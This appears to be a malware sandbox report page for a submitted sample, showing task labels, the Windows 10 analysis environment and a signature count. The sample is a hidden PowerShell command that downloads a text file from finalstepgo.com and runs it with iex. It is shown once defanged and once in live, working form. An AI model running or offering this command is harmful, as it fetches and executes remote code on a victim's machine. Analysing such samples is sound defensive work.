hxxp://"PowerShell[.]exe" -W Hidden -command $url = 'hxxps://finalstepgo[.]com/uploads/il22[.]txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response[.]Content; iex $text

Static task

static1

URLScan task

urlscan1

Behavioral task

behavioral1

Sample

http://"PowerShell.exe" -W Hidden -command $url = 'https://finalstepgo.com/uploads/il22.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

Resource

win10v2004-20240802-en

discovery

windows10-2004-x64

9 signatures

120 seconds

Sharing

General

Malware Config

Signatures

Files